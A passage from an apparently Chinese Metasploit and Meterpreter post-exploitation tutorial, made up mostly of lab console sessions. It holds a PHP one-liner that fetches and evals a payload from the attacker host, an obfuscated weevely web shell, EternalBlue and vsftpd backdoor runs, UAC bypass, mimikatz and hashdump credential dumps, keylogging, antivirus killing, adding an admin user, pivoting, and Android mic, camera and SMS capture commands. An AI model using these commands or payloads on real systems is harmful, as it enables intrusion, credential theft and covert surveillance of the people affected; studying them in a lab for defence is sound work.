SSL  falsenoNegotiate SSL for incoming connections
SSLCert  no Path to a custom SSL certificate (default is randomly g
   enerated)
URIPATH noThe URI to use for this exploit (default is random)
Payload options (python/meterpreter/reverse_tcp):
 Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOSTyes   The listen address (an interface may be specified)
LPORT  4444 yesThe listen port
Exploit target:
Id  Name
--  ----
   0   Python
msf6 exploit(multi/script/web_delivery) > show targets
Exploit targets:
   Id  Name
   --  ----
   0   Python
   1   PHP
   2   PSH
   3   Regsvr32
   4   pubprn
   5   SyncAppvPublishingServer
   6   PSH (Binary)
   7   Linux
   8   Mac OS X
msf6 exploit(multi/script/web_delivery) > set target 1
target => 1
msf6 exploit(multi/script/web_delivery) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/script/web_delivery) > set lport 8899
lport => 8888
msf6 exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.150:8899  
[*] Using URL: http://0.0.0.0:8080/SPzNh9
msf6 exploit(multi/script/web_delivery) > [*] Local IP: http://192.168.0.150:8080/SPzNh9  
[*] Server started.  
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.150:8080/SPzNh9', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
在浏览器中输入:http://192.168.0.160:8100/sec/17/example.php?cmd=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.160:8080/SPzNh9', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
[*] 192.168.0.150   web_delivery - Delivering Payload (1114 bytes)
[*] Sending stage (39282 bytes) to 192.168.0.150
[*] Meterpreter session 1 opened (192.168.0.150:8899 -> 192.168.0.160:38676 ) at 2022-06-16 18:38:14  0800
msf6 exploit(multi/script/web_delivery) > sessions
Active sessions
===============
  Id  Name  TypeInformation   Connection
  --  ----  ---------------   ----------
  1   meterpreter php/linux  www-data @ Jerry  192.168.0.150:8899 -> 192.168.0.150:38676  (192.168.0.150)
msf6 exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > dir
Listing: /var/www/html/sec/17
=============================
Mode  Size  Type  Last modified  Name
----  ----  ----  -------------  ----
100766/rwxrw-rw-  110   fil   2022-06-06 19:09:45  0800  example.php
meterpreter > pwd
/var/www/html/sec/17
meterpreter > getuid
Server username: www-data
利用Web系统进行远程控制
代码语言:javascript复制
#weevely generate 123456 ./testweb.php
Generated './testweb.php' with password '123456' of 677 byte size.

testweb.php

代码语言:javascript复制
<?php
$B='$k){hg$c=strlen($hgk)hg;$l=sthghgrlen($t);hg$o="";for($i=0hg;hg$i<$l;)hg{for($j=hg0;($jhghg<hg$chg&&$i<$l);$jhg  ,$ih';< span=""></hg$chg&&$i<$l);$jhg  ,$ih';<>
$c='=@ob_get_conthgentshg();@ob_hgend_clhgean();$r=hg@bashge64_enhgcodehg(@x(@hggzhgcompresshg($o),$k));prihgnt("$phg$khgh$r$kf");}';
$R=str_replace('R','','crReaRRte_fuRncRtRion');
$L='$k="ehg10hgahgdc3hg9";$kh="49ba5hg9abbe5hg6";$khgf="e057f20fhghg883e";$p="kRXhgw88VYFzhgEOYQOk"hghg;functihgon x($hgt,';
$I=':/hghg/inputhg"),hg$mhg)==1) {@ob_starhgt();@evahgl(@gzuncomhgpresshg(@x(@hgbashge64_decodhge($m[1]hg),$k)))hg;hghg$o';
$k='g  ){$o.=$t{$i}^$k{$j}hg;}}rhgeturnhg $o;}ifhg hg(@prhgeg_match("/$khhg(. )$kfhg/hg",@file_gethghg_conhgtents("php';
$J=str_replace('hg','',$L.$B.$k.$I.$c);
$h=$R('',$J);$h();
?>
代码语言:javascript复制
# weevely http://192.168.0.106:8100/sec/19/testweb.php 123456
[ ] weevely 4.0.1
[ ] Target: 192.168.0.150:8100
[ ] Session:/root/.weevely/sessions/192.168.0.150/testweb_0.session
[ ] Browse the filesystem or execute commands starts the connection
[ ] to the target. Type :help for more information.
weevely> help
:file_rmRemove remote file.
:file_clearlogRemove string from a file.
:file_editEdit remote file on a local editor.
:file_bzip2  Compress or expand bzip2 files.
:file_upload  Upload file to remote filesystem.
:file_downloadDownload file from remote filesystem. 
:file_ls   List directory content.
:file_webdownload Download an URL.  
:file_cp   Copy single file. 
:file_find Find files with given names and attributes.  
:file_enum Check existence and permissions of a list of paths. 
:file_tar  Compress or expand tar archives. 
:file_touchChange file timestamp.
 :file_zip  Compress or expand zip files. 
 :file_mountMount remote filesystem using HTTPfs.
 :file_gzip Compress or expand gzip files.
 :file_cd   Change current working directory.
 :file_upload2web   Upload file automatically to a web folder and get corresponding URL.
 :file_read Read remote file from the remote filesystem. 
 :file_grep Print lines matching a pattern in multiple files.
 :file_checkGet attributes and permissions of a file.
 :shell_sh  Execute shell commands.
 :shell_php Execute PHP commands. 
 :shell_su  Execute commands with su. 
 :sql_dump  Multi dbms mysqldump replacement.
 :sql_console  Execute SQL query or run console.
 :system_extensionsCollect PHP and webserver extension list.
 :system_info  Collect system information.
 :system_procs List running processes.
 :audit_filesystem Audit the file system for weak permissions.  
 :audit_disablefunctionbypass  Bypass disable_function restrictions with mod_cgi and .htaccess.
 :audit_etcpasswd  Read /etc/passwd with different techniques.  
 :audit_suidsgid   Find files with SUID or SGID flags.  
 :audit_phpconfAudit PHP configuration.  
 :bruteforce_sql   Bruteforce SQL database.  
 :backdoor_tcp Spawn a shell on a TCP port.  
 :backdoor_reversetcp  Execute a reverse TCP shell.  
 :net_scan  TCP Port scan.
 :net_proxy Run local proxy to pivot HTTP/HTTPS browsing through the target.
 :net_ifconfig Get network interfaces addresses.
 :net_curl  Perform a curl-like HTTP request.
 :net_mail  Send mail.
 :net_phpproxy Install PHP proxy on the target.
DESKTOP-9A8VFKB:C:xampphtdocssec19 $ system_info
 -------------------- ------------------------------------------------------------------------------------------------------------------------------------- 
| document_root    | C:/xampp/htdocs                                                                         |
| whoami                 |                                                                                           |
| hostname              | DESKTOP-9A8VFKB                                                                         |
| pwd                    | C:xampphtdocssec19                                                                |
| open_basedir           |                                                                                           |
| safe_mode              | False                                                                                     |
| script                 | /sec/19/testweb.php                                                                     |
| script_folder          | C:xampphtdocssec19                                                                |
| uname                  | Windows NT DESKTOP-9A8VFKB 6.2 build 9200 (Windows 8 Home Premium Edition) i586 |
| os                     | Windows NT                                                                              |
| client_ip              | 192.168.0.150                                                                           |
| max_execution_time   | 30                                                                                        |
| php_self               | /sec/19/testweb.php                                                                     |
| dir_sep                |                                                                                          |
| php_version            | 5.6.28                                                                                  |
 -------------------- ------------------------------------------------------------------------------------------------------------------------------------- 

DESKTOP-9A8VFKB:C:xampphtdocssec19 $ autit_filesystem
'autit_filesystem' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���

资源文件

最基本的资源文件

代码语言:javascript复制
#echo version >resource.rc
#echo loadsounds >> version
#echo loadsounds >>resource.rc
代码语言:javascript复制
# msfconsole -r resource.rc
…
[*] Processing resource.rc for ERB directives.
resource (resource.rc)> version
Framework: 6.1.27-dev
Console  : 6.1.27-dev
resource (resource.rc)> load sounds
[*] Successfully loaded plugin: sounds
msf6 >

攻击Windows 7资源文件

windows7.rc

use exploit/windows/smb/ms17_010_eternalblueset rhost 192.168.0.155run

代码语言:javascript复制
# msfconsole -r windows7.rc
…

攻击Windows 10资源文件

Windows 10.rc

se exploit/multi/handlerset lhost 192.168.0.150set lport 8888set payload windows/meterpreter/reverse_tcprun

代码语言:javascript复制
# msfconsole -r windows10.rc
…

攻击Android资源文件

android.rc

set lhost 192.168.0.150set lport 9999set payload android/meterpreter/reverse_tcp

代码语言:javascript复制
# msfconsole -r android.rc
…

渗透Linux

代码语言:javascript复制
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.160
rhost => 192.168.0.160
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 192.168.0.160:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.0.160:21 - USER: 331 Please specify the password.
[ ] 192.168.0.160:21 - Backdoor service has been spawned, handling...
[ ] 192.168.0.160:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.0.150:38079 -> 192.168.0.160:6200) at 2022-06-30 17:41:05  0800

Meterpreter指南(后渗透技术)

基本命令

meterpreter常用命令

命令

作用

background

返回,把Meterpreter后台挂起

sessions

查看当前建立的会话

sessions -i number

与第n个会话进行交互

sessions -i

显示当前的回话

sessions -k number

与第n个会话进行交互关闭

bgkill

杀死一个 Meterpreter 脚本

bglist

提供所有正在运行的后台脚本的列表

bgrun

作为一个后台线程运行脚本

channel

显示活动频道

close

关闭通道

exit

终止 Meterpreter 会话

quit

终止 Meterpreter 会话

interact id

切换进一个信道

run

执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的autoroute,hashdump,arp_scanner,multi_meter_inject等

irb

进入 Ruby 脚本模式

read

从通道读取数据write# 将数据写入到一个通道

use

加载 meterpreter 的扩展

load/use

加载模块

Resource

执行一个已有的rc脚本

针对安卓的命令

dump_contacts

获取手机通讯录

dump_sms

获取短信记录

send_sms -d 15330252525 -t “hello”

控制实验手机发短信

geolocate

获取实验手机GPS定位信息

wlan_geolocate

获取实验手机Wi-Fi定位信息

record_mic -d 5

控制实验手机录音

webcam_list

获取实验手机相机设备

webcam_snap

控制实验手机拍照

webcam_stream

直播实验手机摄像头

针对Windows的一些命令

ps

查看进程:

getpid

查看当前进程号:

sysinfo

查看系统信息:

route

查看完整网络设置:

getsystem

自动提权

getuid

查看当前权限

pwd

查看当前处于目标机的那个目录

其他命令

查看目标机是否为虚拟机:run post/windows/gather/checkvm

关闭杀毒软件:run post/windows/manage/killav

启动远程桌面协议:run post/windows/manage/enable_rdp

列举当前登录的用户:run post/windows/gather/enum_logged_on_users

查看当前应用程序:run post/windows/gather/enum_applications

抓取目标机的屏幕截图:load espia ; screengrab

获取相机设备:webcam_list

控制拍照:webcam_snap

直播摄像头:webcam_stream

控制录音:record_mic

查看当前目录:getlwd

导出当前用户密码哈希 run hashdump

用户名:SID:LM哈希:NTLM哈希:::

也可以使用下面这个命令导出权限更高 run windows/gather/smart_hashdump

抓取自动登录的用户名和密码 run windows/gather/credentials/windows_autologin

直接获取明文密码(注意这个功能需要获取系统权限获取系统权限需要输入getsystem)

Shell 脚本

进入Windows的终端shell

文件系统命令

文件交互指令

ID

Command

Description

1

cat

读取文件内容

2

cd

切换靶机目录

3

cp

复制文件到目标

4

mv

移动到目标

5

chmod

修改文件权限(比如chmod 777 shell.elf)

6

del / rm

删除靶机文件

7

dir

打印靶机目录

8

mkdir

在靶机上创建目录

9

rmdir

删除靶机目录

10

edit

编辑文件

11

getlwd

打印本地目录

12

getwd

打印靶机目录

13

lcd

更改本地目录

14

lls

列出本地目录

15

ls

列出靶机文件目录

16

lpwd

打印本地目录

17

pwd

打印工作目录

19

search

搜索文件详情search -h

Linux权限

chmod 777 {文件名.后缀}

chmod 777 shell.elf

upload

上传文件到目标机主上,如upload setup.exe C:windowssystem32

download nimeia.txt /root/Desktop/

# 下载文件到本机上如:download C:boot.ini /root/或者download C:“ProgramFiles”TencentQQUsers295******125Msg2.0.db /root/

search

search 文件,如

search -d c: -f*.doc

search -d c:UsersxiangDesktop -f *.txt

enumdesktops

用户登录数

ipconfig

查看IP地址

其他命令

截屏

meterpreter > screenshot

Screenshot saved to: /home/jerry/BqXLvJAp.jpeg

获得系统信息

代码语言:javascript复制
meterpreter > sysinfo
Computer                     : WIN-2VEIIKHJ7M8
OS                            : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture              : x64
System Language        : zh_CN
Domain                     : WORKGROUP
Logged On Users        : 2
Meterpreter              : x64/windows

获取键盘信息

代码语言:javascript复制
meterpreter > ps
Process List
============
 PID   PPID  NameArch  Session  User  Path
…
  exe
 1184  1132  explorer.exex64   1  WIN-2VEIIKHJ7M8小铃铛   C:WindowsExplorer.EXE
meterpreter > migrate 1184 迁移到1184进程中
[*] Migrating from 2496 to 1184... 
[*] Migration completed successfully.  
meterpreter > run post/windows/capture/keylog_recorder
[*] Executing module against WIN-2VEIIKHJ7M8
[*] Starting the keylog recorder...
[*] Keystrokes being saved in to /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt 
[*] Recording keystrokes... 
^C[*] User interrupt.  
[*] Shutting down keylog recorder. Please wait...
# cat /root/.msf4/loot/20220624132219_default_192.168.0.158_host.windows.key_244146.txt
Keystroke log from explorer.exe on WIN-2VEIIKHJ7M8 with user WIN-2VEIIKHJ7M8小铃铛 started at 2022-06-24 13:22:19  0800
tgest
<^H><^H><^H><^H><^H><^H>test
I a
mFy<^H><^H>Gu
Xiang
www.
3
Keylog Recorder exited at 2022-06-24 13:24:03  0800

提权

最基础的提权

代码语言:javascript复制
meterpreter >
getuid
Server username:
E86004903967404Administrator
meterpreter >
getsystem
...got system
via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
getuid
Server username:
NT AUTHORITYSYSTEM

利用漏洞提权

Windows 7

代码语言:javascript复制
meterpreter >
background
msf6
exploit(windows/local/ms15_051_client_copy_image) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload
configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6
exploit(windows/smb/ms17_010_eternalblue) > use
exploit/windows/smb/ms17_010_eternalblue
[*] Using
configured payload windows/x64/meterpreter/reverse_tcp
msf6
exploit(windows/smb/ms17_010_eternalblue) > set SESSION 1
SESSION =>
1msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.168
rhost =>
192.168.0.168
msf6
exploit(windows/smb/ms17_010_eternalblue) > exploit

绕过UAC提权

Windows 7

用户账户控制(User Account Control,简写作UAC)是微软公司在其Windows Vista及更高版本操作系统中采用的一种控制机制。其原理是通知用户是否对应用程序使用硬盘驱动器和系统文件授权,以达到帮助阻止恶意程序(有时也称为“恶意软件”)损坏系统的效果。

代码语言:javascript复制
meterpreter >
background
msf6
exploit(multi/handler) > use exploit/windows/local/bypassuac
[*] No payload
configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac)
> set session 2
session => 2
msf6
exploit(windows/local/bypassuac) > exploit
[*] Started
reverse TCP handler on 192.168.0.150:4444
[*] UAC is
Enabled, checking level...
[ ] UAC is set
to Default
[ ] BypassUAC
can bypass this setting, continuing...
…
[*] Meterpreter
session 3 opened (192.168.0.150:4444 -> 192.168.0.168:58389) at 2022-07-19
15:45:06  0800
meterpreter >
getuid
Server username:
WIN-2VEIIKHJ7M8小铃铛
meterpreter >
getsystem
...got system
via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
getuid
Server username:
NT AUTHORITYSYSTEM
meterpreter >

触发UAC机制

Windows 10

代码语言:javascript复制
meterpreter
> background
[*]
Backgrounding session 1...
msf6
exploit(multi/handler) > use exploit/windows/local/ask
[*] No payload
configured, defaulting to windows/meterpreter/reverse_tcp
msf6
exploit(windows/local/ask) > set session 1
session => 1
msf6
exploit(windows/local/ask) > set filename payload.exe
filename =>
payload.exe
msf6 exploit(windows/local/ask)
> exploit
[*] Started
reverse TCP handler on 192.168.0.150:4444
[*] UAC is
Enabled, checking level...
[*] The user
will be prompted, wait for them to click 'Ok'
[*] Uploading
payload.exe - 73802 bytes to the filesystem...
[*] Executing
Command!
[*] Sending
stage (175686 bytes) to 192.168.0.106
[*] Meterpreter
session 2 opened (192.168.0.150:4444 -> 192.168.0.106:2513) at 2022-06-27
11:39:52  0800
meterpreter
> getsystem
...got system via technique 1 (Named
Pipe Impersonation (In Memory/Admin)).

获取用户名密码

提取密码哈希值

Windows 10
代码语言:javascript复制
meterpreter > getsystem
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:ca24769333d0f9419d17e86998b56519:::
xiang:1001:aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f::: 
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID  PPID  Name   Arch  Session  User Path
 ---  ----  ----   ----  -------  ---- ----
 736  644   lsass.exe  x64   0NT AUTHORITYSYSTEM  C:WindowsSystem32lsass.exe
meterpreter > migrate 736
[*] Migrating from 5724 to 736...
[*] Migration completed successfully.
meterpreter > load kiwi
Loading extension kiwi...'
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##   > http://blog.gentilkiwi.com/mimikatz
 '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com )
  '#####' > http://pingcastle.com / http://mysmartlogon.com  ***/
Success. 
meterpreter > kiwi_cmd sekurlsa::logonpasswords
…
SID   : S-1-5-21-2772671008-4265266102-715737954-1001
       msv :      
        [00000003] Primary
        * Username : xianggu625@126.com
        * Domain   : MicrosoftAccount
        * NTLM : 4f151ab2d4afdef65f9664b0422ad83f
       tspkg :      
       wdigest :      
        * Username : xianggu625@126.com
        * Domain   : MicrosoftAccount
        * Password : (null)
       kerberos :      
        * Username : xianggu625@126.com
        * Domain   : MicrosoftAccount
        * Password : (null)
       ssp :      
       credman :      
       cloudap :      
…

重新进入

代码语言:javascript复制
msf6 exploit(windows/local/ask) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 443
msf6 exploit(multi/handler) set rhost 192.168.0.106
rhost => 192.168.0.106
msf6 exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) set SMBPass aad3b435b51404eeaad3b435b51404ee:4f151ab2d4afdef65f9664b0422ad83f
SMBPass => aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(multi/handler) exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Sending stage (175686 bytes) to 192.168.0.106
[*] Meterpreter session 2 opened (192.168.0.150:4444 -> 192.168.0.106:21198) at 2022-06-27 16:14:14  0800
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.106:21197) at 2022-06-27 16:14:14  0800
meterpreter >

Windows7

代码语言:javascript复制
meterpreter > getsystem
[-] Already running as SYSTEM
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 7a3026b2f119d51ec136ea51a0acddd6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
小铃铛:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID  PPID  Name   Arch  Session  User Path
 ---  ----  ----   ----  -------  ---- ----
 512  396   lsass.exe  x64   0NT AUTHORITYSYSTEM  C:Windowssystem32lsass.exe
meterpreter > migrate 512
[*] Migrating from 1672 to 512...
[*] Migration completed successfully.
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##   > http://blog.gentilkiwi.com/mimikatz
 '## v ##'Vincent LE TOUX( vincent.letoux@gmail.com )
  '#####' > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
meterpreter > kiwi_cmd sekurlsa::logonpasswords
Authentication Id : 0 ; 81005 (00000000:00013c6d)
Session   : Interactive from 1
User Name :   : WIN-2VEIIKHJ7M8
        * LM   : 44efce164ab921caaad3b435b51404ee
        * NTLM : 32ed87bdb5fdc5e9cba88547376818d4
        * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
       tspkg :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       wdigest :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       kerberos :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       ssp :      
       credman :      
        [00000000]���
  PPgN
  .#####.   mimikatz 2.2.0 (x64) #19041 May 17 2022 19:25:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ##  / ##   > https://blog.gentilkiwi.com/mimikatz
 '## v ##'   Vincent LE TOUX ( vincent.letoux@gmail.com )
  '#####'> https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # sekurlsa::logonpasswords
Authentication Id : 0 ; 81005 (00000000:00013c6d)
Session   : Interactive from 1
User Name : Ô۔
Domain: WIN-2VEIIKHJ7M8
Logon Server  : WIN-2VEIIKHJ7M8
Logon Time: 2022/6/27 14:58:54
SID   : S-1-5-21-2305812133-3308626755-1024735854-1000
       msv :      
        [00000003] Primary
        * Username : Ô۔
        * Domain   : WIN-2VEIIKHJ7M8
        * LM   : 44efce164ab921caaad3b435b51404ee
        * NTLM : 32ed87bdb5fdc5e9cba88547376818d4
        * SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
       tspkg :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       wdigest :      
        * Username : (null)
        * Domain   : WIN-2VEIIKHJ7M8
        * Password : 123456
       kerberos :      
        * Username : (null)
        *

重新进入

代码语言:javascript复制
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.0.150
lhost => 192.168.0.150
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > set rhost 192.168.0.158
rhost => 192.168.0.158
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set SMBPass 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
SMBPass => 44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.150:4444
[*] Sending stage (175686 bytes) to 192.168.0.158
[*] Meterpreter session 1 opened (192.168.0.150:4444 -> 192.168.0.158:49194) at 2022-06-27 17:20:14  0800
meterpreter >

令牌假冒添加用户

代码语言:javascript复制
meterpreter > ps | grep lsass
Filtering on 'lsass'
Process List
============
 PID  PPID  Name   Arch  Session  User Path
 ---  ----  ----   ----  -------  ---- ----
 736  644   lsass.exe  x64   0NT AUTHORITYSYSTEM  C:WindowsSystem32lsass.exe meterpreter > steal_token 736
Stolen token with username: NT AUTHORITYSYSTEM
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
DESKTOP-9A8VFKBxiang
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
NT SERVICEReportServer
Window ManagerDWM-1
Impersonation Tokens Available
========================================
Font Driver HostUMFD-0
Font Driver HostUMFD-1
NT AUTHORITYANONYMOUS LOGON
NT SERVICEMSSQLFDLauncher
NT SERVICEMSSQLSERVER
NT SERVICEMSSQLServerOLAPService
meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[ ] Delegation token available
[ ] Successfully impersonated user NT AUTHORITYSYSTEM
meterpreter > add_user tom 123456 -h 192.168.0.106
[*] Attempting to add user tom to host 192.168.0.106
[ ] Successfully added user
meterpreter > add_group_user "administrators" tom -h 192.168.0.106
…

跳板

目标为安装vsftpd V2.3.4的Linux机器

Windows10->vsftpd V2.3.4的Linux机器

代码语言:javascript复制
meterpreter >
run get_local_subnets
[!] Meterpreter
scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run
post/multi/manage/autoroute OPTION=value [...]
Local subnet:
192.168.0.0/255.255.255.0
Local subnet:
192.168.5.0/255.255.255.0
Local subnet:
192.168.81.0/255.255.255.0
meterpreter >
background
[*]
Backgrounding session 3...
msf6
exploit(windows/local/ask) > route add 192.168.0.0 255.255.255.0 3
[*] Route added
msf6
exploit(windows/local/ask) > route print
IPv4 Active
Routing Table
=========================
 Subnet             Netmask            Gateway
 ------             -------            -------
 192.168.0.0        255.255.255.0      Session 3
[*] There are
currently no IPv6 routes defined.
msf6
exploit(windows/smb/ms17_010_eternalblue) > use
exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload
configured, defaulting to cmd/unix/interact
msf6
exploit(unix/ftp/vsftpd_234_backdoor) > set payload cmd/unix/interact
payload =>
cmd/unix/interact
msf6
exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.0.171
rhost =>
192.168.0.171
sf6
exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*]
192.168.0.171:21 - Banner: 220 (vsFTPd 2.3.4)
[*]
192.168.0.171:21 - USER: 331 Please specify the password.
[ ]
192.168.0.171:21 - Backdoor service has been spawned, handling...
[ ]
192.168.0.171:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command
shell session 4 opened (192.168.0.106:29720 -> 192.168.0.171:6200 via
session 3) at 2022-07-19 17:00:32  0800

使用Meterpreter运行脚本

运行VNC

Windows 10
代码语言:javascript复制
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:UsersxiangAppDataLocalTempeiISyc.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.150:4545...
[-] Could not execute vnc: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
到windows里面运行C:UsersxiangAppDataLocalTempeiISyc.exe会看到效果
meterpreter > [*] VNC Server session 3 opened (192.168.0.150:4545 -> 192.168.0.106:8611) at 2022-06-28 11:38:32  0800
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "desktop-9a8vfkb"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
Windows 7
代码语言:javascript复制
meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.0.150 LPORT=4545
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:WindowsTEMPYNpMWsIZ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.0.150:4545...
meterpreter > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
[*] VNC Server session 2 opened (192.168.0.150:4545 -> 192.168.0.158:49170) at 2022-06-28 12:22:50  0800
Desktop name "win-2veiikhj7m8"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding

迁移进程

代码语言:javascript复制
meterpreter > run post/windows/manage/migrate
[*] Running module against DESKTOP-9A8VFKB
[*] Current server process: payload.exe (8716)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 9944
[ ] Successfully migrated into process 9944

关闭杀毒软件

代码语言:javascript复制
meterpreter > run killav
[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...

获取系统密码哈希值

代码语言:javascript复制
meterpreter > run hashdump
[!] Meterpreter scripts are deprecated. Try post/windows/gather/smart_hashdump.
[!] Example: run post/windows/gather/smart_hashdump OPTION=value [...]
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 4368ea4193e43ce242a9fec38c370ea2...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
